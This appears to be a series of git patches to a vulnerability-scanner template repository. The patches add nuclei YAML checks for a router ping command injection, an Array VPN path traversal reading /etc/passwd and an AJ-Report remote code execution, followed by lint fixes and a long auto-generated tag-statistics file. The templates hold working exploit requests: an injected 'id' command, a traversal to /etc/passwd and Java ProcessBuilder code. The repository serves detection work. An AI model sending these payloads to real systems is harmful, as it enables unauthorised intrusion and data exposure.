/cgi-bin/Save.cgi?cgi=PING HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic b3BlcmF0b3I6MTIzNA== + Content-Type: application/x-www-form-urlencoded + Content-Length: 33 + + pid=2061&ip=127.0.0.1;id×=1 + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + condition: and + + - type: status + status: + - 200 From b7d889fac5a456805a3225c3ab5741c0b3df7be4 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:29:44 +0530 Subject: [PATCH 186/847] Create array-vpn-lfi.yaml --- http/vulnerabilities/other/array-vpn-lfi.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/vulnerabilities/other/array-vpn-lfi.yaml diff --git a/http/vulnerabilities/other/array-vpn-lfi.yaml b/http/vulnerabilities/other/array-vpn-lfi.yaml new file mode 100644 index 0000000000..e8a1b14843 --- /dev/null +++ b/http/vulnerabilities/other/array-vpn-lfi.yaml @@ -0,0 +1,34 @@ +id: array-vpn-lfi + +info: + name: Array VPN - Arbitrary File Reading Vulnerability + author: pussycat0x + severity: high + description: | + Array VPN Arbitrary File Reading Vulnerability + reference: + - https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: product="Array-VPN" + tags: lfi,vpn,arrayvpn + +http: + - raw: + - | + GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1 + Host: {{Hostname}} + Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 + Accept-Encoding: gzip, deflate + X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + condition: and + + - type: status + status: + - 200 From 623c041231ee7c97d48f9e64fe81781e22568903 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:31:42 +0530 Subject: [PATCH 187/847] Create aj-report-rce.yaml --- http/vulnerabilities/other/aj-report-rce.yaml | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/vulnerabilities/other/aj-report-rce.yaml diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/vulnerabilities/other/aj-report-rce.yaml new file mode 100644 index 0000000000..00fc980bbb --- /dev/null +++ b/http/vulnerabilities/other/aj-report-rce.yaml @@ -0,0 +1,42 @@ +id: aj-report-rce + +info: + name: AJ-Report Open Source Data Screen - Remote Code Execution + author: pussycat0x + severity: high + description: | + AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious. + reference: + - https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: title="AJ-Report" + tags: aj-report,rce + +http: + - raw: + - | + POST /dataSetParam/verification;swagger-ui/ HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Content-Type: application/json;charset=UTF-8 + + {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "code" + - "data" + condition: and + + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + + - type: status + status: + - 200 From c2184ad85926fbce21aafdb70d96626821963b18 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:36:21 +0530 Subject: [PATCH 188/847] lint -fix --- http/vulnerabilities/other/aj-report-rce.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/vulnerabilities/other/aj-report-rce.yaml index 00fc980bbb..b7d313b260 100644 --- a/http/vulnerabilities/other/aj-report-rce.yaml +++ b/http/vulnerabilities/other/aj-report-rce.yaml @@ -22,7 +22,6 @@ http: {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} - matchers-condition: and matchers: - type: word From bb0465068ab2e918d687a5048056ef2a88005a61 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:43:24 +0530 Subject: [PATCH 189/847] Update aj-report-rce.yaml --- http/vulnerabilities/other/aj-report-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/vulnerabilities/other/aj-report-rce.yaml index b7d313b260..aa59ce8e6e 100644 --- a/http/vulnerabilities/other/aj-report-rce.yaml +++ b/http/vulnerabilities/other/aj-report-rce.yaml @@ -20,8 +20,8 @@ http: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Content-Type: application/json;charset=UTF-8 - {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} - + {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} + matchers-condition: and matchers: - type: word From 33854482cfbcca306cda6884bd6832bf9a38fe77 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 23 May 2024 15:03:19 +0000 Subject: [PATCH 190/847] Auto Generated Templates Stats [Thu May 23 15:03:19 UTC 2024] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 10686 +++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 5367 insertions(+), 5341 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 8da832e644..b1b1c7734c 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":2474},{"name":"panel","count":1133},{"name":"wordpress","count":973},{"name":"exposure","count":908},{"name":"xss","count":904},{"name":"wp-plugin","count":844},{"name":"osint","count":804},{"name":"tech","count":674},{"name":"lfi","count":654},{"name":"misconfig","count":606},{"name":"edb","count":599},{"name":"rce","count":591},{"name":"packetstorm","count":530},{"name":"wpscan","count":495},{"name":"cve2021","count":491},{"name":"cve2022","count":476},{"name":"wp","count":419},{"name":"cve2023","count":364},{"name":"unauth","count":363},{"name":"sqli","count":352},{"name":"file","count":346},{"name":"authenticated","count":342},{"name":"intrusive","count":299},{"name":"kev","count":268},{"name":"detect","count":259},{"name":"login","count":259},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"oast","count":221},{"name":"config","count":220},{"name":"top-200","count":215},{"name":"default-login","count":211},{"name":"osint-social","count":210},{"name":"network","count":194},{"name":"token","count":193},{"name":"","count":191},{"name":"apache","count":188},{"name":"devops","count":176},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":165},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":142},{"name":"redirect","count":135},{"name":"aws","count":133},{"name":"cloud","count":132},{"name":"auth-bypass","count":129},{"name":"ssrf","count":119},{"name":"phishing","count":117},{"name":"amazon","count":116},{"name":"files","count":113},{"name":"cve2010","count":112},{"name":"cms","count":110},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"install","count":107},{"name":"top-100","count":100},{"name":"aws-cloud-config","count":89},{"name":"disclosure","count":89},{"name":"linux","count":83},{"name":"code","count":81},{"name":"local","count":80},{"name":"privesc","count":79},{"name":"takeover","count":79},{"name":"seclists","count":79},{"name":"tokens","count":78},{"name":"fileupload","count":76},{"name":"oracle","count":70},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"cve2024","count":63},{"name":"adobe","count":62},{"name":"js","count":62},{"name":"ir","count":61},{"name":"huntr","count":59},{"name":"cve2015","count":59},{"name":"cve2016","count":57},{"name":"atlassian","count":57},{"name":"vmware","count":56},{"name":"google","count":56},{"name":"c2","count":55},{"name":"enum","count":55},{"name":"tenable","count":48},{"name":"logs","count":48},{"name":"log4j","count":47},{"name":"hackerone","count":46},{"name":"vulhub","count":46},{"name":"aem","count":45},{"name":"osint-gaming","count":45},{"name":"php","count":44},{"name":"jndi","count":44},{"name":"cve2014","count":44},{"name":"debug","count":44},{"name":"deserialization","count":43},{"name":"oa","count":42},{"name":"osint-hobby","count":42},{"name":"generic","count":42},{"name":"osint-porn","count":42},{"name":"plugin","count":42},{"name":"traversal","count":42},{"name":"springboot","count":41},{"name":"misc","count":39},{"name":"cnvd","count":39},{"name":"microsoft","count":38},{"name":"injection","count":38},{"name":"kubernetes","count":37},{"name":"jira","count":37},{"name":"listing","count":37},{"name":"ibm","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"ssl","count":33},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"tls","count":30},{"name":"ec2","count":30},{"name":"wp-theme","count":29},{"name":"dlink","count":29},{"name":"api","count":28},{"name":"gitlab","count":28},{"name":"ssh","count":28},{"name":"k8s","count":28},{"name":"bestwebsoft","count":27},{"name":"fortinet","count":27},{"name":"citrix","count":27},{"name":"cve2012","count":26},{"name":"proxy","count":26},{"name":"firewall","count":25},{"name":"lfr","count":25},{"name":"manageengine","count":25},{"name":"zohocorp","count":25},{"name":"weaver","count":25},{"name":"dns","count":24},{"name":"zoho","count":24},{"name":"osint-finance","count":24},{"name":"admin","count":24},{"name":"osint-images","count":24},{"name":"osint-business","count":24},{"name":"osint-shopping","count":24},{"name":"yonyou","count":23},{"name":"tomcat","count":23},{"name":"file-upload","count":23},{"name":"stored-xss","count":23},{"name":"audit","count":23},{"name":"xxe","count":23},{"name":"prestashop","count":22},{"name":"cicd","count":22},{"name":"s3","count":22},{"name":"dast","count":21},{"name":"printer","count":21},{"name":"github","count":21},{"name":"msf","count":21},{"name":"ecology","count":21},{"name":"weblogic","count":21},{"name":"camera","count":20},{"name":"jenkins","count":20},{"name":"grafana","count":19},{"name":"ftp","count":19},{"name":"wavlink","count":19},{"name":"rukovoditel","count":19},{"name":"struts","count":19},{"name":"hp","count":19},{"name":"android","count":18},{"name":"ruijie","count":18},{"name":"osint-music","count":18},{"name":"cve2011","count":18},{"name":"coldfusion","count":18},{"name":"mail","count":17},{"name":"service","count":17},{"name":"nginx","count":17},{"name":"azure","count":17},{"name":"node.js","count":17},{"name":"confluence","count":17},{"name":"vpn","count":16},{"name":"magento","count":16},{"name":"backup","count":16},{"name":"status","count":16},{"name":"honeypot","count":16},{"name":"jarm","count":16},{"name":"alibaba","count":16},{"name":"osint-blog","count":16},{"name":"microweber","count":16},{"name":"cve2009","count":16},{"name":"rconfig","count":16},{"name":"dashboard","count":15},{"name":"cve2008","count":15},{"name":"zyxel","count":15},{"name":"cve2013","count":15},{"name":"seeyon","count":15},{"name":"bypass","count":15},{"name":"java","count":15},{"name":"ruby","count":15},{"name":"backdoor","count":15},{"name":"woocommerce","count":15},{"name":"nodejs","count":15},{"name":"cnvd2021","count":15},{"name":"tongda","count":15},{"name":"node","count":14},{"name":"npm","count":14},{"name":"rds","count":14},{"name":"auth","count":14},{"name":"setup","count":14},{"name":"osint-art","count":14},{"name":"windows","count":14},{"name":"smb","count":14},{"name":"dell","count":14},{"name":"domainmod","count":14},{"name":"login-check","count":14},{"name":"nagios","count":14},{"name":"redhat","count":14},{"name":"smtp","count":14},{"name":"redis","count":14},{"name":"osint-health","count":14},{"name":"docker","count":14},{"name":"ssti","count":14},{"name":"creds-stuffing","count":14},{"name":"git","count":14},{"name":"headless","count":14},{"name":"icewarp","count":14},{"name":"jboss","count":14},{"name":"moosocial","count":13},{"name":"mysql","count":13},{"name":"postgresql","count":13},{"name":"fortigate","count":13},{"name":"ivanti","count":13},{"name":"rails","count":13},{"name":"hashicorp","count":13},{"name":"graphql","count":13},{"name":"laravel","count":13},{"name":"abstractapi","count":13},{"name":"osint-political","count":13},{"name":"airflow","count":13},{"name":"netgear","count":13},{"name":"cuppacms","count":13},{"name":"osint-dating","count":13},{"name":"sonicwall","count":13},{"name":"cuppa","count":13},{"name":"drupal","count":12},{"name":"kafka","count":12},{"name":"zimbra","count":12},{"name":"webserver","count":12},{"name":"ofbiz","count":12},{"name":"doppler","count":12},{"name":"netsweeper","count":12},{"name":"newrelic","count":12},{"name":"vbulletin","count":12},{"name":"django","count":11},{"name":"fastjson","count":11},{"name":"iam","count":11},{"name":"online-fire-reporting","count":11},{"name":"hikvision","count":11},{"name":"installer","count":11},{"name":"info-leak","count":11},{"name":"cache","count":11},{"name":"xstream","count":11},{"name":"phpgurukul","count":11},{"name":"osint-video","count":11},{"name":"iis","count":11},{"name":"jolokia","count":11},{"name":"phpmyadmin","count":11},{"name":"jetbrains","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"spring","count":11},{"name":"prometheus","count":11},{"name":"elasticsearch","count":10},{"name":"thinkphp","count":10},{"name":"db","count":10},{"name":"glpi","count":10},{"name":"samsung","count":10},{"name":"symfony","count":10},{"name":"solr","count":10},{"name":"solarview","count":10},{"name":"dropbox","count":10},{"name":"digitalocean","count":10},{"name":"sitecore","count":10},{"name":"dedecms","count":10},{"name":"zabbix","count":10},{"name":"xstream_project","count":10},{"name":"druid","count":9},{"name":"lucee","count":9},{"name":"gitea","count":9},{"name":"dahua","count":9},{"name":"moodle","count":9},{"name":"wso2","count":9},{"name":"pfsense","count":9},{"name":"cnvd2020","count":9},{"name":"secret","count":9},{"name":"firebase","count":9},{"name":"exchange","count":9},{"name":"elastic","count":9},{"name":"facebook","count":9},{"name":"crlf","count":9},{"name":"cloudtrail","count":9},{"name":"python","count":9},{"name":"vcenter","count":9},{"name":"sangfor","count":9},{"name":"bitbucket","count":9},{"name":"progress","count":9},{"name":"artica","count":9},{"name":"opencats","count":9},{"name":"scada","count":9},{"name":"blind","count":9},{"name":"kube","count":9},{"name":"sophos","count":9},{"name":"versa","count":9},{"name":"ognl","count":8},{"name":"huawei","count":8},{"name":"mlflow","count":8},{"name":"manager","count":8},{"name":"config-audit","count":8},{"name":"wanhu","count":8},{"name":"emerge","count":8},{"name":"osint-news","count":8},{"name":"spotweb_project","count":8},{"name":"hms","count":8},{"name":"error","count":8},{"name":"odoo","count":8},{"name":"cloud-enum","count":8},{"name":"recon","count":8},{"name":"go","count":8},{"name":"oauth","count":8},{"name":"console","count":8},{"name":"atom","count":8},{"name":"cisco-switch","count":8},{"name":"metadata","count":8},{"name":"symantec","count":8},{"name":"phpjabbers","count":8},{"name":"spotweb","count":8},{"name":"bucket","count":8},{"name":"gateway","count":8},{"name":"phpinfo","count":8},{"name":"default-page","count":8},{"name":"unauthenticated","count":8},{"name":"mirai","count":8},{"name":"e-office","count":8},{"name":"discord","count":8},{"name":"exploitdb","count":7},{"name":"keking","count":7},{"name":"nacos","count":7},{"name":"nortekcontrol","count":7},{"name":"landray","count":7},{"name":"shopify","count":7},{"name":"nexus","count":7},{"name":"openemr","count":7},{"name":"teamcity","count":7},{"name":"bloofox","count":7},{"name":"database","count":7},{"name":"maps","count":7},{"name":"instrusive","count":7},{"name":"mongodb","count":7},{"name":"fortios","count":7},{"name":"bigip","count":7},{"name":"oos","count":7},{"name":"linkedin","count":7},{"name":"avtech","count":7},{"name":"filemanager","count":7},{"name":"rfi","count":7},{"name":"telesquare","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"ruckus","count":7},{"name":"solarwinds","count":7},{"name":"vms","count":7},{"name":"contec","count":7},{"name":"vpc","count":7},{"name":"activemq","count":7},{"name":"nagiosxi","count":7},{"name":"pmb","count":7},{"name":"gogs","count":7},{"name":"blockchain","count":7},{"name":"fpd","count":7},{"name":"websphere","count":7},{"name":"mobileiron","count":7},{"name":"cacti","count":7},{"name":"twitter","count":7},{"name":"moodating","count":7},{"name":"joomla\\!","count":7},{"name":"monstra","count":7},{"name":"f5","count":7},{"name":"slack","count":7},{"name":"squirrelmail","count":7},{"name":"opensis","count":7},{"name":"kubelet","count":6},{"name":"jetty","count":6},{"name":"tikiwiki","count":6},{"name":"microfocus","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"flutterwave","count":6},{"name":"doctor-appointment-system","count":6},{"name":"openvpn","count":6},{"name":"beyondtrust","count":6},{"name":"sonarqube","count":6},{"name":"gcp","count":6},{"name":"minio","count":6},{"name":"advantech","count":6},{"name":"couchdb","count":6},{"name":"zhiyuan","count":6},{"name":"cockpit","count":6},{"name":"74cms","count":6},{"name":"splunk","count":6},{"name":"server","count":6},{"name":"rat","count":6},{"name":"bmc","count":6},{"name":"paypal","count":6},{"name":"geoserver","count":6},{"name":"cobbler","count":6},{"name":"webmin","count":6},{"name":"log","count":6},{"name":"leak","count":6},{"name":"jeecg","count":6},{"name":"asp","count":6},{"name":"lfprojects","count":6},{"name":"vrealize","count":6},{"name":"express","count":6},{"name":"magmi","count":6},{"name":"plesk","count":6},{"name":"elfinder","count":6},{"name":"sql","count":6},{"name":"liferay","count":6},{"name":"servicenow","count":6},{"name":"typo3","count":6},{"name":"asus","count":6},{"name":"ldap","count":6},{"name":"chanjet","count":6},{"name":"synacor","count":6},{"name":"microstrategy","count":6},{"name":"keycloak","count":6},{"name":"jamf","count":6},{"name":"zzzcms","count":5},{"name":"mikrotik","count":5},{"name":"chamilo","count":5},{"name":"10web","count":5},{"name":"qnap","count":5},{"name":"rseenet","count":5},{"name":"web3","count":5},{"name":"webview","count":5},{"name":"firmware","count":5},{"name":"agentejo","count":5},{"name":"totolink","count":5},{"name":"caucho","count":5},{"name":"metinfo","count":5},{"name":"xmlrpc","count":5},{"name":"papercut","count":5},{"name":"gocd","count":5},{"name":"apisix","count":5},{"name":"sftp","count":5},{"name":"resin","count":5},{"name":"adminer","count":5},{"name":"tibco","count":5},{"name":"nuuo","count":5},{"name":"glpi-project","count":5},{"name":"circontrol","count":5},{"name":"genetechsolutions","count":5},{"name":"square","count":5},{"name":"wbce","count":5},{"name":"avaya","count":5},{"name":"matrix","count":5},{"name":"swagger","count":5},{"name":"ethereum","count":5},{"name":"pyload","count":5},{"name":"crushftp","count":5},{"name":"connectwise","count":5},{"name":"parallels","count":5},{"name":"goanywhere","count":5},{"name":"ems","count":5},{"name":"strapi","count":5},{"name":"voip","count":5},{"name":"cloudflare","count":5},{"name":"adb","count":5},{"name":"tenda","count":5},{"name":"jabber","count":5},{"name":"openstack","count":5},{"name":"redmine","count":5},{"name":"craftcms","count":5},{"name":"react","count":5},{"name":"hybris","count":5},{"name":"elementor","count":5},{"name":"hpe","count":5},{"name":"dionaea","count":5},{"name":"open-emr","count":5},{"name":"openai","count":5},{"name":"circarlife","count":5},{"name":"akamai","count":5},{"name":"asana","count":5},{"name":"jupyter","count":5},{"name":"axigen","count":5},{"name":"thedigitalcraft","count":5},{"name":"magmi_project","count":5},{"name":"schneider-electric","count":5},{"name":"storage","count":5},{"name":"kkfileview","count":5},{"name":"decision-center","count":5},{"name":"cdata","count":5},{"name":"paloaltonetworks","count":5},{"name":"sentry","count":5},{"name":"sysaid","count":5},{"name":"avideo","count":5},{"name":"acm","count":5},{"name":"mssql","count":5},{"name":"cnvd2023","count":5},{"name":"awstats","count":5},{"name":"carrental","count":5},{"name":"fatpipe","count":5},{"name":"cve2007","count":5},{"name":"terramaster","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"jwt","count":5},{"name":"graylog","count":5},{"name":"percha","count":5},{"name":"froxlor","count":4},{"name":"nosqli","count":4},{"name":"kyocera","count":4},{"name":"hoteldruid","count":4},{"name":"os4ed","count":4},{"name":"veronalabs","count":4},{"name":"auieo","count":4},{"name":"pega","count":4},{"name":"webmail","count":4},{"name":"panabit","count":4},{"name":"password","count":4},{"name":"joomlamo","count":4},{"name":"photo","count":4},{"name":"ternaria","count":4},{"name":"opencms","count":4},{"name":"eclipse","count":4},{"name":"flickr","count":4},{"name":"casaos","count":4},{"name":"metabase","count":4},{"name":"creativeitem","count":4},{"name":"kevinlab","count":4},{"name":"wireguard","count":4},{"name":"thinkcmf","count":4},{"name":"jorani","count":4},{"name":"datadog","count":4},{"name":"cnvd2022","count":4},{"name":"digitaldruid","count":4},{"name":"newstatpress_project","count":4},{"name":"sound4","count":4},{"name":"telegram","count":4},{"name":"codeigniter","count":4},{"name":"dom","count":4},{"name":"finicity","count":4},{"name":"metersphere","count":4},{"name":"juniper","count":4},{"name":"igniterealtime","count":4},{"name":"reprisesoftware","count":4},{"name":"concrete","count":4},{"name":"wp-statistics","count":4},{"name":"linkerd","count":4},{"name":"bamboo","count":4},{"name":"stripe","count":4},{"name":"mitel","count":4},{"name":"confluent","count":4},{"name":"consul","count":4},{"name":"harmistechnology","count":4},{"name":"churchcrm","count":4},{"name":"mailchimp","count":4},{"name":"intelbras","count":4},{"name":"kibana","count":4},{"name":"mautic","count":4},{"name":"sendgrid","count":4},{"name":"httpd","count":4},{"name":"jsf","count":4},{"name":"age-encryption","count":4},{"name":"cve2005","count":4},{"name":"rabbitmq","count":4},{"name":"http","count":4},{"name":"salesforce","count":4},{"name":"kentico","count":4},{"name":"learnpress","count":4},{"name":"candidats","count":4},{"name":"purchase_order_management_system_project","count":4},{"name":"dahuasecurity","count":4},{"name":"tiki","count":4},{"name":"zte","count":4},{"name":"pmb_project","count":4},{"name":"telerik","count":4},{"name":"search","count":4},{"name":"dropbear","count":4},{"name":"hongdian","count":4},{"name":"osgeo","count":4},{"name":"h3c","count":4},{"name":"pluginus","count":4},{"name":"prtg","count":4},{"name":"roxy","count":4},{"name":"aspose","count":4},{"name":"wcs","count":4},{"name":"metasploit","count":4},{"name":"angular","count":4},{"name":"articatech","count":4},{"name":"terra-master","count":4},{"name":"openfire","count":4},{"name":"harbor","count":4},{"name":"centos","count":4},{"name":"httpserver","count":4},{"name":"yeswiki","count":4},{"name":"owncloud","count":4},{"name":"osint-archived","count":4},{"name":"moveit","count":4},{"name":"heroku","count":4},{"name":"mantisbt","count":4},{"name":"newstatpress","count":4},{"name":"wpdevart","count":4},{"name":"postmessage","count":4},{"name":"phppgadmin","count":4},{"name":"horde","count":4},{"name":"dolibarr","count":4},{"name":"umbraco","count":4},{"name":"cnvd2019","count":4},{"name":"seagate","count":4},{"name":"panos","count":4},{"name":"pentaho","count":4},{"name":"ebs","count":4},{"name":"rubyonrails","count":4},{"name":"grav","count":4},{"name":"env","count":4},{"name":"webshell","count":4},{"name":"dotnet","count":4},{"name":"springcloud","count":4},{"name":"zend","count":4},{"name":"powerjob","count":4},{"name":"info","count":4},{"name":"hongfan","count":4},{"name":"sugarcrm","count":4},{"name":"mcafee","count":4},{"name":"spark","count":4},{"name":"qdpm","count":4},{"name":"bitrix","count":4},{"name":"linuxfoundation","count":4},{"name":"puppet","count":4},{"name":"nextjs","count":4},{"name":"bittrex","count":4},{"name":"hospital_management_system_project","count":4},{"name":"webkul","count":4},{"name":"flink","count":4},{"name":"fit2cloud","count":4},{"name":"shiro","count":4},{"name":"jellyfin","count":4},{"name":"mostra","count":4},{"name":"easypost","count":4},{"name":"pixie","count":4},{"name":"linksys","count":4},{"name":"aria","count":4},{"name":"pie-register","count":4},{"name":"ray","count":4},{"name":"artifactory","count":4},{"name":"pip","count":4},{"name":"okta","count":4},{"name":"flatpress","count":4},{"name":"aura","count":4},{"name":"rocketchat","count":4},{"name":"globalprotect","count":4},{"name":"kingsoft","count":4},{"name":"royalevent","count":4},{"name":"audiocodes","count":4},{"name":"gnuboard","count":4},{"name":"arcgis","count":4},{"name":"ampache","count":4},{"name":"mostracms","count":4},{"name":"djangoproject","count":4},{"name":"jfrog","count":4},{"name":"phpjabber","count":4},{"name":"d-link","count":4},{"name":"figma","count":4},{"name":"boldgrid","count":3},{"name":"backdropcms","count":3},{"name":"labkey","count":3},{"name":"cas","count":3},{"name":"processwire","count":3},{"name":"contribsys","count":3},{"name":"webalizer","count":3},{"name":"rstudio","count":3},{"name":"jitsi","count":3},{"name":"thruk","count":3},{"name":"ampps","count":3},{"name":"wwbn","count":3},{"name":"netlify","count":3},{"name":"dotnetnuke","count":3},{"name":"waf","count":3},{"name":"airtable","count":3},{"name":"automattic","count":3},{"name":"fileman","count":3},{"name":"credential","count":3},{"name":"unifi","count":3},{"name":"academylms","count":3},{"name":"r-seenet","count":3},{"name":"ruckuswireless","count":3},{"name":"strangerstudios","count":3},{"name":"mpsec","count":3},{"name":"ad","count":3},{"name":"csrf","count":3},{"name":"instagram","count":3},{"name":"actuator","count":3},{"name":"key","count":3},{"name":"gvectors","count":3},{"name":"grp","count":3},{"name":"monitor","count":3},{"name":"piwigo","count":3},{"name":"particle","count":3},{"name":"segment","count":3},{"name":"axis2","count":3},{"name":"thinfinity","count":3},{"name":"yii","count":3},{"name":"octobercms","count":3},{"name":"drawio","count":3},{"name":"truenas","count":3},{"name":"lotus","count":3},{"name":"limesurvey","count":3},{"name":"vercel","count":3},{"name":"fastly","count":3},{"name":"telnet","count":3},{"name":"axis","count":3},{"name":"eshop","count":3},{"name":"postman","count":3},{"name":"webnus","count":3},{"name":"dvr","count":3},{"name":"purchase-order","count":3},{"name":"default","count":3},{"name":"ixcache","count":3},{"name":"structurizr","count":3},{"name":"siemens","count":3},{"name":"superadmin","count":3},{"name":"favicon","count":3},{"name":"myeventon","count":3},{"name":"std42","count":3},{"name":"nc","count":3},{"name":"itop","count":3},{"name":"adiscon","count":3},{"name":"yzmcms","count":3},{"name":"backdrop","count":3},{"name":"chatgpt","count":3},{"name":"sharefile","count":3},{"name":"listserv","count":3},{"name":"e-mobile","count":3},{"name":"3cx","count":3},{"name":"flexvnf","count":3},{"name":"teampass","count":3},{"name":"carel","count":3},{"name":"contentful","count":3},{"name":"smuggling","count":3},{"name":"jeesns","count":3},{"name":"reddit","count":3},{"name":"self-hosted","count":3},{"name":"steve","count":3},{"name":"softwarepublico","count":3},{"name":"modoboa","count":3},{"name":"rlm","count":3},{"name":"axway","count":3},{"name":"dev.pucit.edu.pk","count":3},{"name":"subrion","count":3},{"name":"copyparty","count":3},{"name":"apple","count":3},{"name":"aptus","count":3},{"name":"magnolia","count":3},{"name":"cloudwatch","count":3},{"name":"zeit","count":3},{"name":"joomlacomponent.inetlanka","count":3},{"name":"adafruit","count":3},{"name":"netfortris","count":3},{"name":"redash","count":3},{"name":"bash","count":3},{"name":"hsphere","count":3},{"name":"tplus","count":3},{"name":"clientid","count":3},{"name":"h2o","count":3},{"name":"fanwei","count":3},{"name":"flutter","count":3},{"name":"checkpoint","count":3},{"name":"epson","count":3},{"name":"bigant","count":3},{"name":"sqlite","count":3},{"name":"afterlogic","count":3},{"name":"rancher","count":3},{"name":"fuelcms","count":3},{"name":"mongo","count":3},{"name":"discourse","count":3},{"name":"covenant","count":3},{"name":"openwrt","count":3},{"name":"dos","count":3},{"name":"webadmin","count":3},{"name":"targa","count":3},{"name":"etsy","count":3},{"name":"evlink","count":3},{"name":"dzzoffice","count":3},{"name":"i3geo","count":3},{"name":"draytek","count":3},{"name":"clusterengine","count":3},{"name":"ueditor","count":3},{"name":"shell","count":3},{"name":"circleci","count":3},{"name":"mythic","count":3},{"name":"cybelesoft","count":3},{"name":"sony","count":3},{"name":"spotify","count":3},{"name":"finecms","count":3},{"name":"xerox","count":3},{"name":"pypi","count":3},{"name":"gibbon","count":3},{"name":"petya","count":3},{"name":"messaging","count":3},{"name":"selenium","count":3},{"name":"intercom","count":3},{"name":"superset","count":3},{"name":"netdata","count":3},{"name":"ninjaforms","count":3},{"name":"phpipam","count":3},{"name":"buffalo","count":3},{"name":"tableau","count":3},{"name":"dotcms","count":3},{"name":"sidekiq","count":3},{"name":"supsystic","count":3},{"name":"mooveagency","count":3},{"name":"switch","count":3},{"name":"lighttpd","count":3},{"name":"fanruan","count":3},{"name":"apollo","count":3},{"name":"geowebserver","count":3},{"name":"synology","count":3},{"name":"newsletter","count":3},{"name":"empirecms","count":3},{"name":"webcam","count":3},{"name":"purchase-order-management-system","count":3},{"name":"gnu","count":3},{"name":"avada","count":3},{"name":"forum","count":3},{"name":"mailgun","count":3},{"name":"cpanel","count":3},{"name":"getsimple","count":3},{"name":"complete_online_job_search_system_project","count":3},{"name":"nortek","count":3},{"name":"zeroshell","count":3},{"name":"nuxtjs","count":3},{"name":"voipmon